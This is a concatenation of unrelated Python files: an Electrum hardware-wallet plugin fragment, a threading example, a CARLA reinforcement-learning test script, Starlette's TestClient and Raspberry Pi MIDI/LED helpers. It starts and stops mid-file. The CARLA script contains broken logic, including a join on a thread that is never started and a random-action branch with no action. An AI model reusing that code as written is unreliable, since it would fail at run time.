PartialTransaction) assert isinstance(txin, PartialTxInput) assert keystore if len(txin.pubkeys) > 1: xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin) multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes) else: multisig = None script_type = self.get_safet_input_script_type(txin.script_type) txinputtype = self.types.TxInputType( script_type=script_type, multisig=multisig) my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin) if full_path: txinputtype._extend_address_n(full_path) prev_hash = txin.prevout.txid prev_index = txin.prevout.out_idx if txin.value_sats() is not None: txinputtype.amount = txin.value_sats() txinputtype.prev_hash = prev_hash txinputtype.prev_index = prev_index if txin.script_sig is not None: txinputtype.script_sig = txin.script_sig txinputtype.sequence = txin.nsequence inputs.append(txinputtype) return inputs def _make_multisig(self, m, xpubs): if len(xpubs) == 1: return None pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs] return self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * len(pubkeys), m=m) def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'): def create_output_by_derivation(): script_type = self.get_safet_output_script_type(txout.script_type) if 
len(txout.pubkeys) > 1: xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout) multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes) else: multisig = None my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout) assert full_path txoutputtype = self.types.TxOutputType( multisig=multisig, amount=txout.value, address_n=full_path, script_type=script_type) return txoutputtype def create_output_by_address(): txoutputtype = self.types.TxOutputType() txoutputtype.amount = txout.value if address: txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS txoutputtype.address = address else: txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout) return txoutputtype outputs = [] has_change = False any_output_on_change_branch = is_any_tx_output_on_change_branch(tx) for txout in tx.outputs(): address = txout.address use_create_by_derivation = False if txout.is_mine and not has_change: # prioritise hiding outputs on the 'change' branch from user # because no more than one change address allowed # note: ^ restriction can be removed once we require fw # that has https://github.com/trezor/trezor-mcu/pull/306 if txout.is_change == any_output_on_change_branch: use_create_by_derivation = True has_change = True if use_create_by_derivation: txoutputtype = create_output_by_derivation() else: txoutputtype = create_output_by_address() outputs.append(txoutputtype) return outputs def electrum_tx_to_txtype(self, tx: Optional[Transaction]): t = self.types.TransactionType() if tx is None: # probably for segwit input and we don't need this prev txn return t tx.deserialize() t.version = tx.version t.lock_time = tx.locktime inputs = self.tx_inputs(tx) t._extend_inputs(inputs) for out in tx.outputs(): o = t._add_bin_outputs() o.amount = out.value o.script_pubkey = out.scriptpubkey return t # This function is called from the TREZOR libraries (via tx_api) def get_tx(self, tx_hash): tx = self.prev_tx[tx_hash] return self.electrum_tx_to_txtype(tx)
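A tiny illustration of the pairing trick used in show_address above ("sort xpubs using the order of pubkeys"): zipping the two lists and sorting carries each xpub along with its pubkey. The literal values below are made up.

pubkeys = ["03aa", "02bb", "02aa"]          # hypothetical hex-encoded pubkeys
xpubs = ["xpubA", "xpubB", "xpubC"]         # xpubs in the same order as pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))  # sorts by pubkey, each xpub tags along
print([xpub for _pubkey, xpub in sorted_pairs])  # ['xpubC', 'xpubB', 'xpubA']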
example6.py
from threading import Thread
import threading
import time


class BankAccount:
    def __init__(self):
        self.lock = threading.Lock()
        self.sufficientBalanceCondition = threading.Condition(self.lock)
        self.balance = 0

    def deposit(self, amount):
        self.lock.acquire()
        try:
            newBalance = self.balance + amount
            self.balance = newBalance
            print("Depositing: %d, new balance is %d" % (amount, newBalance))
            self.sufficientBalanceCondition.notify_all()
        finally:
            self.lock.release()

    def withdraw(self, amount):
        self.lock.acquire()
        try:
            # Re-check the predicate after every wakeup; wait() can return
            # before the balance is actually sufficient.
            while self.balance < amount:
                self.sufficientBalanceCondition.wait()
            newBalance = self.balance - amount
            self.balance = newBalance
            print("Withdrawing: %d, new balance is %d" % (amount, newBalance))
        finally:
            self.lock.release()

    def getBalance(self):
        return self.balance


def triggerDeposits(bankAccount, amount, count):
    print("In here")
    for i in range(count):
        bankAccount.deposit(amount)
        # time.sleep(1)


def triggerWithdraws(bankAccount, amount, count):
    for i in range(count):
        bankAccount.withdraw(amount)
        # time.sleep(1)


if __name__ == '__main__':
    bAcct = BankAccount()
    amount = 100
    repetitions = 100
    threads = 100
    for i in range(threads):
        t1 = Thread(target=triggerDeposits, args=(bAcct, amount, repetitions,))
        t2 = Thread(target=triggerWithdraws, args=(bAcct, amount, repetitions,))
        t1.start()
        t2.start()
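For reference, a minimal sketch of the same wait logic using Condition.wait_for, which re-checks the predicate for you; it mirrors the explicit while-loop guard in withdraw above. The module-level names here are illustrative only.

import threading

_lock = threading.Lock()
_sufficient = threading.Condition(_lock)
_balance = 0

def withdraw(amount):
    global _balance
    with _sufficient:
        _sufficient.wait_for(lambda: _balance >= amount)  # blocks until the predicate holds
        _balance -= amount

def deposit(amount):
    global _balance
    with _sufficient:
        _balance += amount
        _sufficient.notify_all()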
test.py
# Load the trained model # Test it on the seen and unseen environment # # Seen environment - (X, Y) = (143.5, 207.0) # Unseen envioronment - (X, Y) = from keras.models import load_model import glob import os import sys import random import time import numpy as np import cv2 import math from collections import deque from keras.applications.xception import Xception from keras.layers import Dense, GlobalAveragePooling2D from keras.optimizers import Adam from keras.models import Model from keras.callbacks import TensorBoard import tensorflow as tf import keras.backend.tensorflow_backend as backend #from tensorflow.keras import backend from threading import Thread from tqdm import tqdm ''' try: sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % ( sys.version_info.major, sys.version_info.minor, 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0]) except IndexError: pass ''' #sys.path.append() import carla SHOW_PREVIEW = False IM_WIDTH = 320 IM_HEIGHT = 240 SECONDS_PER_EPISODE = 10 REPLAY_MEMORY_SIZE = 5000 MIN_REPLAY_MEMORY_SIZE = 1000 MINIBATCH_SIZE = 4 PREDICTION_BATCH_SIZE = 1 TRAINING_BATCH_SIZE = MINIBATCH_SIZE // 4 UPDATE_TARGET_EVERY = 5 MODEL_NAME = "Xception" DATE = "NOV28" MEMORY_FRACTION = 1.0 MIN_REWARD = -200 EPISODES = 10 DISCOUNT = 0.99 epsilon = 0.0 EPSILON_DECAY = 0.95 ## 0.9975 99975 MIN_EPSILON = 0.001 AGGREGATE_STATS_EVERY = 10 #SEEN_ENV_X = 65.6 # For straight road - seen env #SEEN_ENV_Y = 4.3 # For straight road - seen env #SEEN_YAW = 0.0 # For straight road - seen env SEEN_ENV_X = -74.5 SEEN_ENV_Y = -148.4 SEEN_YAW = -88.0 #UNSEEN_ENV_X = -77.5 #UNSEEN_ENV_Y = 112.2 #UNSEEN_ENV_X = -77.9 #UNSEEN_ENV_Y = -8.1 UNSEEN_ENV_X = -149.0 UNSEEN_ENV_Y = 76.3 UNSEEN_YAW = 90 # Own Tensorboard class class ModifiedTensorBoard(TensorBoard): # Overriding init to set initial step and writer (we want one log file for all .fit() calls) def __init__(self, **kwargs): super().__init__(**kwargs) self.step = 1 self.writer = tf.summary.FileWriter(self.log_dir) # Overriding this method to stop creating default log writer def set_model(self, model): pass # Overrided, saves logs with our step number # (otherwise every .fit() will start writing from 0th step) def on_epoch_end(self, epoch, logs=None): self.update_stats(**logs) # Overrided # We train for one batch only, no need to save anything at epoch end def on_batch_end(self, batch, logs=None): pass # Overrided, so won't close writer def on_train_end(self, _): pass # Custom method for saving own metrics # Creates writer, writes custom metrics and closes writer def update_stats(self, **stats): self._write_logs(stats, self.step) class CarEnv: SHOW_CAM = SHOW_PREVIEW STEER_AMT = 1.0 im_width = IM_WIDTH im_height = IM_HEIGHT front_camera = None def __init__(self): self.client = carla.Client("localhost", 2000) self.client.set_timeout(2.0) self.world = self.client.get_world() self.blueprint_library = self.world.get_blueprint_library() self.model_3 = self.blueprint_library.filter("model3")[0] def reset(self): self.collision_hist = [] self.actor_list = [] random_spawn_point = random.choice(self.world.get_map().get_spawn_points()) #print(random_spawn_point) #self.transform = random.choice(self.world.get_map().get_spawn_points()) #self.transform = carla.Transform(carla.Location(x=65.6, y=4.3), carla.Rotation(yaw=0)) self.transform = carla.Transform(carla.Location(x=UNSEEN_ENV_X, y=UNSEEN_ENV_Y), carla.Rotation(yaw=UNSEEN_YAW)) self.vehicle = self.world.spawn_actor(self.model_3, self.transform) self.actor_list.append(self.vehicle) 
self.rgb_cam = self.blueprint_library.find('sensor.camera.rgb') #self.rgb_cam.set_attribute("image_size_x", self.im_width) #self.rgb_cam.set_attribute("image_size_y", self.im_height) #self.rgb_cam.set_attribute("fov", 110) self.rgb_cam.set_attribute("image_size_x", f"{self.im_width}") self.rgb_cam.set_attribute("image_size_y", f"{self.im_height}") self.rgb_cam.set_attribute("fov", f"110") transform = carla.Transform(carla.Location(x=2.5, z=0.7)) self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle) self.actor_list.append(self.sensor) self.sensor.listen(lambda data: self.process_img(data)) self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) time.sleep(4) colsensor = self.blueprint_library.find("sensor.other.collision") self.colsensor = self.world.spawn_actor(colsensor, transform, attach_to=self.vehicle) self.actor_list.append(self.colsensor) self.colsensor.listen(lambda event: self.collision_data(event)) while self.front_camera is None: time.sleep(0.01) self.episode_start = time.time() self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) return self.front_camera def collision_data(self, event): self.collision_hist.append(event) def process_img(self, image): i = np.array(image.raw_data) #print(i.shape) i2 = i.reshape((self.im_height, self.im_width, 4)) i3 = i2[:, :, :3] if self.SHOW_CAM: cv2.imshow("", i3) cv2.waitKey(1) self.front_camera = i3 def step(self, action): if action == 0: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1*self.STEER_AMT)) elif action == 1: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer= 0)) elif action == 2: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1*self.STEER_AMT)) elif action == 3: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-0.5*self.STEER_AMT)) elif action == 4: self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=0.5*self.STEER_AMT)) v = self.vehicle.get_velocity() kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)) if len(self.collision_hist) != 0: done = True reward = -200 elif kmh < 50: done = False reward = -1 else: done = False reward = 1 if self.episode_start + SECONDS_PER_EPISODE < time.time(): done = True return self.front_camera, reward, done, None class DQNAgent: def __init__(self): #self.model = self.create_model() self.model = load_model("/home/kishor/GWM/Github_Repos/Carla-RL-Sentdex/KK/5_Action_Space/models/Xception__-216.00max_-226.90avg_-238.00min__1574966396.model") self.target_model = load_model("/home/kishor/GWM/Github_Repos/Carla-RL-Sentdex/KK/5_Action_Space/models/Xception__-216.00max_-226.90avg_-238.00min__1574966396.model") #self.target_model = self.create_model() #self.target_model.set_weights(self.model.get_weights()) self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE) #self.tensorboard = ModifiedTensorBoard(log_dir="logs/{MODEL_NAME}-{int(time.time())}") self.tensorboard = ModifiedTensorBoard(log_dir="logs/check") self.target_update_counter = 0 self.graph = tf.get_default_graph() self.terminate = False self.last_logged_episode = 0 self.training_initialized = False def create_model(self): base_model = Xception(weights=None, include_top=False, input_shape=(IM_HEIGHT, IM_WIDTH,3)) x = base_model.output x = GlobalAveragePooling2D()(x) predictions = Dense(3, activation="linear")(x) model = Model(inputs=base_model.input, outputs=predictions) model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=["accuracy"]) return model def update_replay_memory(self, 
transition): # transition = (current_state, action, reward, new_state, done) self.replay_memory.append(transition) def train(self): if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE: return minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE) current_states = np.array([transition[0] for transition in minibatch])/255 with self.graph.as_default(): current_qs_list = self.model.predict(current_states, PREDICTION_BATCH_SIZE) new_current_states = np.array([transition[3] for transition in minibatch])/255 with self.graph.as_default(): future_qs_list = self.target_model.predict(new_current_states, PREDICTION_BATCH_SIZE) X = [] y = [] for index, (current_state, action, reward, new_state, done) in enumerate(minibatch): if not done: max_future_q = np.max(future_qs_list[index]) new_q = reward + DISCOUNT * max_future_q else: new_q = reward current_qs = current_qs_list[index] current_qs[action] = new_q X.append(current_state) y.append(current_qs) log_this_step = False if self.tensorboard.step > self.last_logged_episode: log_this_step = True self.last_log_episode = self.tensorboard.step with self.graph.as_default(): self.model.fit(np.array(X)/255, np.array(y), batch_size=TRAINING_BATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if log_this_step else None) if log_this_step: self.target_update_counter += 1 if self.target_update_counter > UPDATE_TARGET_EVERY: self.target_model.set_weights(self.model.get_weights()) self.target_update_counter = 0 def get_qs(self, state): return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0] def train_in_loop(self): X = np.random.uniform(size=(1, IM_HEIGHT, IM_WIDTH, 3)).astype(np.float32) y = np.random.uniform(size=(1, 3)).astype(np.float32) with self.graph.as_default(): self.model.fit(X,y, verbose=False, batch_size=1) self.training_initialized = True while True: if self.terminate: return self.train() time.sleep(0.01) if __name__ == '__main__': FPS = 10 # For stats ep_rewards = [-200] # For more repetitive results random.seed(1) np.random.seed(1) tf.set_random_seed(1) # Memory fraction, used mostly when trai8ning multiple agents gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION) backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))) # Create models folder if not os.path.isdir('models'): os.makedirs('models') # Create agent and environment agent = DQNAgent() env = CarEnv() # Start training thread and wait for training to be initialized #trainer_thread = Thread(target=agent.train_in_loop, daemon=True) #trainer_thread.start() #while not agent.training_initialized: # time.sleep(0.01) # Initialize predictions - forst prediction takes longer as of initialization that has to be done # It's better to do a first prediction then before we start iterating over episode steps agent.get_qs(np.ones((env.im_height, env.im_width, 3))) # Iterate over episodes for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'): #try: env.collision_hist = [] # Update tensorboard step every episode agent.tensorboard.step = episode # Restarting episode - reset episode reward and step number episode_reward = 0 step = 1 # Reset environment and get initial state current_state = env.reset() # Reset flag and start iterating until episode ends done = False episode_start = time.time() # Play for given number of seconds only while True: # This part stays mostly the same, the change is to query a model for Q values if np.random.random() > epsilon: # Get action from Q table action = 
np.argmax(agent.get_qs(current_state)) print("Lets take action :{}".format(action)) else: # Get random action #action = np.random.randint(0, 3) # This takes no time, so we add a delay matching 60 FPS (prediction above takes longer) time.sleep(1/FPS) new_state, reward, done, _ = env.step(action) # Transform new continous state to new discrete state and count reward episode_reward += reward # Every step we update replay memory agent.update_replay_memory((current_state, action, reward, new_state, done)) current_state = new_state step += 1 if done: break # save episode rewards # End of episode - destroy agents for actor in env.actor_list: actor.destroy() # Append episode reward to a list and log stats (every given number of episodes) ep_rewards.append(episode_reward) if not episode % AGGREGATE_STATS_EVERY or episode == 1: average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:]) min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:]) max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:]) agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon) # Save model, but only when min reward is greater or equal a set value #if min_reward >= MIN_REWARD: # agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model') # print("Did I save the model?") # #agent.model.save("check.model") # Decay epsilon if epsilon > MIN_EPSILON: epsilon *= EPSILON_DECAY epsilon = max(MIN_EPSILON, epsilon) # save ep_rewards list to a excel sheet with open("reward_file.txt", "w") as rfile: for item in ep_rewards: print(item) rfile.write(str(item)) rfile.write("\n") # Set termination flag for training thread and wait for it to finish agent.terminate = True trainer_thread.join() #agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
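# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): the TD-target update
# that DQNAgent.train() applies to every minibatch entry, reduced to plain
# NumPy so it can be read and run in isolation.  The discount value and the
# toy numbers below are assumptions for demonstration only.
import numpy as np

def q_target(reward, future_qs, done, discount=0.99):
    """Return the target used to overwrite the Q value of the action taken."""
    if done:
        # Terminal transition: no future reward is available.
        return reward
    return reward + discount * float(np.max(future_qs))

def _q_target_demo():
    current_qs = np.array([0.1, -0.3, 0.2], dtype=np.float32)  # model output for the current state
    future_qs = np.array([0.5, 0.0, -0.1], dtype=np.float32)   # target-model output for the next state
    action, reward, done = 2, 1.0, False
    current_qs[action] = q_target(reward, future_qs, done)     # 1.0 + 0.99 * 0.5 = 1.495
    return current_qs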
testclient.py
import asyncio import http import inspect import io import json import queue import threading import types import typing from urllib.parse import unquote, urljoin, urlsplit import requests from starlette.types import Message, Receive, Scope, Send from starlette.websockets import WebSocketDisconnect # Annotations for `Session.request()` Cookies = typing.Union[ typing.MutableMapping[str, str], requests.cookies.RequestsCookieJar ] Params = typing.Union[bytes, typing.MutableMapping[str, str]] DataType = typing.Union[bytes, typing.MutableMapping[str, str], typing.IO] TimeOut = typing.Union[float, typing.Tuple[float, float]] FileType = typing.MutableMapping[str, typing.IO] AuthType = typing.Union[ typing.Tuple[str, str], requests.auth.AuthBase, typing.Callable[[requests.Request], requests.Request], ] ASGIInstance = typing.Callable[[Receive, Send], typing.Awaitable[None]] ASGI2App = typing.Callable[[Scope], ASGIInstance] ASGI3App = typing.Callable[[Scope, Receive, Send], typing.Awaitable[None]] class _HeaderDict(requests.packages.urllib3._collections.HTTPHeaderDict): def get_all(self, key: str, default: str) -> str: return self.getheaders(key) class _MockOriginalResponse: """ We have to jump through some hoops to present the response as if it was made using urllib3. """ def __init__(self, headers: typing.List[typing.Tuple[bytes, bytes]]) -> None: self.msg = _HeaderDict(headers) self.closed = False def isclosed(self) -> bool: return self.closed class _Upgrade(Exception): def __init__(self, session: "WebSocketTestSession") -> None: self.session = session def _get_reason_phrase(status_code: int) -> str: try: return http.HTTPStatus(status_code).phrase except ValueError: return "" def _is_asgi3(app: typing.Union[ASGI2App, ASGI3App]) -> bool: if inspect.isclass(app): return hasattr(app, "__await__") elif inspect.isfunction(app): return asyncio.iscoroutinefunction(app) call = getattr(app, "__call__", None) return asyncio.iscoroutinefunction(call) class _WrapASGI2: """ Provide an ASGI3 interface onto an ASGI2 app. """ def __init__(self, app: ASGI2App) -> None: self.app = app async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None: instance = self.app(scope) await instance(receive, send) class _ASGIAdapter(requests.adapters.HTTPAdapter): def __init__( self, app: ASGI3App, raise_server_exceptions: bool = True, root_path: str = "" ) -> None: self.app = app self.raise_server_exceptions = raise_server_exceptions self.root_path = root_path def send( self, request: requests.PreparedRequest, *args: typing.Any, **kwargs: typing.Any ) -> requests.Response: scheme, netloc, path, query, fragment = ( str(item) for item in urlsplit(request.url) ) default_port = {"http": 80, "ws": 80, "https": 443, "wss": 443}[scheme] if ":" in netloc: host, port_string = netloc.split(":", 1) port = int(port_string) else: host = netloc port = default_port # Include the 'host' header. if "host" in request.headers: headers = [] # type: typing.List[typing.Tuple[bytes, bytes]] elif port == default_port: headers = [(b"host", host.encode())] else: headers = [(b"host", (f"{host}:{port}").encode())] # Include other request headers. 
headers += [ (key.lower().encode(), value.encode()) for key, value in request.headers.items() ] if scheme in {"ws", "wss"}: subprotocol = request.headers.get("sec-websocket-protocol", None) if subprotocol is None: subprotocols = [] # type: typing.Sequence[str] else: subprotocols = [value.strip() for value in subprotocol.split(",")] scope = { "type": "websocket", "path": unquote(path), "root_path": self.root_path, "scheme": scheme, "query_string": query.encode(), "headers": headers, "client": ["testclient", 50000], "server": [host, port], "subprotocols": subprotocols, } session = WebSocketTestSession(self.app, scope) raise _Upgrade(session) scope = { "type": "http", "http_version": "1.1", "method": request.method, "path": unquote(path), "root_path": self.root_path, "scheme": scheme, "query_string": query.encode(), "headers": headers, "client": ["testclient", 50000], "server": [host, port], "extensions": {"http.response.template": {}}, } request_complete = False response_started = False response_complete = False raw_kwargs = {"body": io.BytesIO()} # type: typing.Dict[str, typing.Any] template = None context = None async def receive() -> Message: nonlocal request_complete, response_complete if request_complete: while not response_complete: await asyncio.sleep(0.0001) return {"type": "http.disconnect"} body = request.body if isinstance(body, str): body_bytes = body.encode("utf-8") # type: bytes elif body is None: body_bytes = b"" elif isinstance(body, types.GeneratorType): try: chunk = body.send(None) if isinstance(chunk, str): chunk = chunk.encode("utf-8") return {"type": "http.request", "body": chunk, "more_body": True} except StopIteration: request_complete = True return {"type": "http.request", "body": b""} else: body_bytes = body request_complete = True return {"type": "http.request", "body": body_bytes} async def send(message: Message) -> None: nonlocal raw_kwargs, response_started, response_complete, template, context if message["type"] == "http.response.start": assert ( not response_started ), 'Received multiple "http.response.start" messages.' raw_kwargs["version"] = 11 raw_kwargs["status"] = message["status"] raw_kwargs["reason"] = _get_reason_phrase(message["status"]) raw_kwargs["headers"] = [ (key.decode(), value.decode()) for key, value in message["headers"] ] raw_kwargs["preload_content"] = False raw_kwargs["original_response"] = _MockOriginalResponse( raw_kwargs["headers"] ) response_started = True elif message["type"] == "http.response.body": assert ( response_started ), 'Received "http.response.body" without "http.response.start".' assert ( not response_complete ), 'Received "http.response.body" after response completed.' body = message.get("body", b"") more_body = message.get("more_body", False) if request.method != "HEAD": raw_kwargs["body"].write(body) if not more_body: raw_kwargs["body"].seek(0) response_complete = True elif message["type"] == "http.response.template": template = message["template"] context = message["context"] try: loop = asyncio.get_event_loop() except RuntimeError: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) try: loop.run_until_complete(self.app(scope, receive, send)) except BaseException as exc: if self.raise_server_exceptions: raise exc if self.raise_server_exceptions: assert response_started, "TestClient did not receive any response." 
elif not response_started: raw_kwargs = { "version": 11, "status": 500, "reason": "Internal Server Error", "headers": [], "preload_content": False, "original_response": _MockOriginalResponse([]), "body": io.BytesIO(), } raw = requests.packages.urllib3.HTTPResponse(**raw_kwargs) response = self.build_response(request, raw) if template is not None: response.template = template response.context = context return response class WebSocketTestSession: def __init__(self, app: ASGI3App, scope: Scope) -> None: self.app = app self.scope = scope self.accepted_subprotocol = None self._receive_queue = queue.Queue() # type: queue.Queue self._send_queue = queue.Queue() # type: queue.Queue self._thread = threading.Thread(target=self._run) self.send({"type": "websocket.connect"}) self._thread.start() message = self.receive() self._raise_on_close(message) self.accepted_subprotocol = message.get("subprotocol", None) def __enter__(self) -> "WebSocketTestSession": return self def __exit__(self, *args: typing.Any) -> None: self.close(1000) self._thread.join() while not self._send_queue.empty(): message = self._send_queue.get() if isinstance(message, BaseException): raise message def _run(self) -> None: """ The sub-thread in which the websocket session runs. """ loop = asyncio.new_event_loop() scope = self.scope receive = self._asgi_receive send = self._asgi_send try: loop.run_until_complete(self.app(scope, receive, send)) except BaseException as exc: self._send_queue.put(exc) finally: loop.close() async def _asgi_receive(self) -> Message: while self._receive_queue.empty(): await asyncio.sleep(0) return self._receive_queue.get() async def _asgi_send(self, message: Message) -> None: self._send_queue.put(message) def _raise_on_close(self, message: Message) -> None: if message["type"] == "websocket.close": raise WebSocketDisconnect(message.get("code", 1000)) def send(self, message: Message) -> None: self._receive_queue.put(message) def send_text(self, data: str) -> None: self.send({"type": "websocket.receive", "text": data}) def send_bytes(self, data: bytes) -> None: self.send({"type": "websocket.receive", "bytes": data}) def send_json(self, data: typing.Any, mode: str = "text") -> None: assert mode in ["text", "binary"] text = json.dumps(data) if mode == "text": self.send({"type": "websocket.receive", "text": text}) else: self.send({"type": "websocket.receive", "bytes": text.encode("utf-8")}) def close(self, code: int = 1000) -> None: self.send({"type": "websocket.disconnect", "code": code}) def receive(self) -> Message: message = self._send_queue.get() if isinstance(message, BaseException): raise message return message def receive_text(self) -> str: message = self.receive() self._raise_on_close(message) return message["text"] def receive_bytes(self) -> bytes: message = self.receive() self._raise_on_close(message) return message["bytes"] def receive_json(self, mode: str = "text") -> typing.Any: assert mode in ["text", "binary"] message = self.receive() self._raise_on_close(message) if mode == "text": text = message["text"] else: text = message["bytes"].decode("utf-8") return json.loads(text) class TestClient(requests.Session): __test__ = False # For pytest to not discover this up. 
def __init__( self, app: typing.Union[ASGI2App, ASGI3App], base_url: str = "http://testserver", raise_server_exceptions: bool = True, root_path: str = "", ) -> None: super(TestClient, self).__init__() if _is_asgi3(app): app = typing.cast(ASGI3App, app) asgi_app = app else: app = typing.cast(ASGI2App, app) asgi_app = _WrapASGI2(app) #  type: ignore adapter = _ASGIAdapter( asgi_app, raise_server_exceptions=raise_server_exceptions, root_path=root_path, ) self.mount("http://", adapter) self.mount("https://", adapter) self.mount("ws://", adapter) self.mount("wss://", adapter) self.headers.update({"user-agent": "testclient"}) self.app = asgi_app self.base_url = base_url def request( # type: ignore self, method: str, url: str, params: Params = None, data: DataType = None, headers: typing.MutableMapping[str, str] = None, cookies: Cookies = None, files: FileType = None, auth: AuthType = None, timeout: TimeOut = None, allow_redirects: bool = None, proxies: typing.MutableMapping[str, str] = None, hooks: typing.Any = None, stream: bool = None, verify: typing.Union[bool, str] = None, cert: typing.Union[str, typing.Tuple[str, str]] = None, json: typing.Any = None, ) -> requests.Response: url = urljoin(self.base_url, url) return super().request( method, url, params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allow_redirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert, json=json, ) def websocket_connect( self, url: str, subprotocols: typing.Sequence[str] = None, **kwargs: typing.Any ) -> typing.Any: url = urljoin("ws://testserver", url) headers = kwargs.get("headers", {}) headers.setdefault("connection", "upgrade") headers.setdefault("sec-websocket-key", "testserver==") headers.setdefault("sec-websocket-version", "13") if subprotocols is not None: headers.setdefault("sec-websocket-protocol", ", ".join(subprotocols)) kwargs["headers"] = headers try: super().request("GET", url, **kwargs) except _Upgrade as exc: session = exc.session else: raise RuntimeError("Expected WebSocket upgrade") # pragma: no cover return session def __enter__(self) -> "TestClient": loop = asyncio.get_event_loop() self.send_queue = asyncio.Queue() # type: asyncio.Queue self.receive_queue = asyncio.Queue() # type: asyncio.Queue self.task = loop.create_task(self.lifespan()) loop.run_until_complete(self.wait_startup()) return self def __exit__(self, *args: typing.Any) -> None: loop = asyncio.get_event_loop() loop.run_until_complete(self.wait_shutdown()) async def lifespan(self) -> None: scope = {"type": "lifespan"} try: await self.app(scope, self.receive_queue.get, self.send_queue.put) finally: await self.send_queue.put(None) async def wait_startup(self) -> None: await self.receive_queue.put({"type": "lifespan.startup"}) message = await self.send_queue.get() if message is None: self.task.result() assert message["type"] in ( "lifespan.startup.complete", "lifespan.startup.failed", ) if message["type"] == "lifespan.startup.failed": message = await self.send_queue.get() if message is None: self.task.result() async def wait_shutdown(self) -> None: await self.receive_queue.put({"type": "lifespan.shutdown"}) message = await self.send_queue.get() if message is None: self.task.result() assert message["type"] == "lifespan.shutdown.complete" await self.task
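# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of this module): exercising TestClient
# against a minimal hand-written ASGI app.  The app below is hypothetical and
# exists only to show how a plain HTTP request travels through
# _ASGIAdapter.send() and comes back as a requests.Response.
if __name__ == "__main__":  # pragma: no cover

    async def _demo_app(scope: Scope, receive: Receive, send: Send) -> None:
        # A minimal ASGI3 application that answers every request with "hello".
        assert scope["type"] == "http"
        await send(
            {
                "type": "http.response.start",
                "status": 200,
                "headers": [(b"content-type", b"text/plain")],
            }
        )
        await send({"type": "http.response.body", "body": b"hello"})

    client = TestClient(_demo_app)
    response = client.get("/")
    assert response.status_code == 200
    assert response.text == "hello"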
functions.py
import threading from neopixel import * import mido import datetime import psutil import time import socket import RPi.GPIO as GPIO def get_ip_address(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) local_ip = s.getsockname()[0] s.close() return local_ip def find_between(s, start, end): try: return (s.split(start))[1].split(end)[0] except: return False def clamp(val, val_min, val_max): return max(val_min, min(val, val_max)) def shift(l, n): return l[n:] + l[:n] def play_midi(song_path, midiports, saving, menu, ledsettings, ledstrip): #commented parts are for benchmarking midiports.pending_queue.append(mido.Message('note_on')) if song_path in saving.is_playing_midi.keys(): menu.render_message(song_path, "Already playing", 2000) return saving.is_playing_midi.clear() saving.is_playing_midi[song_path] = True menu.render_message("Playing: ", song_path, 2000) saving.t = threading.currentThread() try: mid = mido.MidiFile("Songs/" + song_path) fastColorWipe(ledstrip.strip, True, ledsettings) #length = mid.length t0 = False total_delay = 0 # notes_count = 0 delay = 0 # message_to_print = '' for message in mid: if song_path in saving.is_playing_midi.keys(): if not t0: t0 = time.time() # if(notes_count >= 100): # notes_count = 0 # print(repr(message_to_print)) # message_to_print = '' # notes_count += 1 total_delay += message.time current_time = (time.time() - t0) + message.time drift = total_delay - current_time if (drift < 0): delay = message.time + drift else: delay = message.time if(delay < 0): delay = 0 #message_to_print += "\n Message: "+str(message)+" Total delay: "+str(total_delay)+" current_time: "+str(current_time)+' message time: ' + str(message.time) + ' actual delay: ' + str( #delay) + ' drift: ' + str(drift) if delay > 0: time.sleep(delay) if not message.is_meta: midiports.playport.send(message) midiports.pending_queue.append(message.copy(time=0)) else: break print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, total_delay)) #print('play time: {:.2f} s 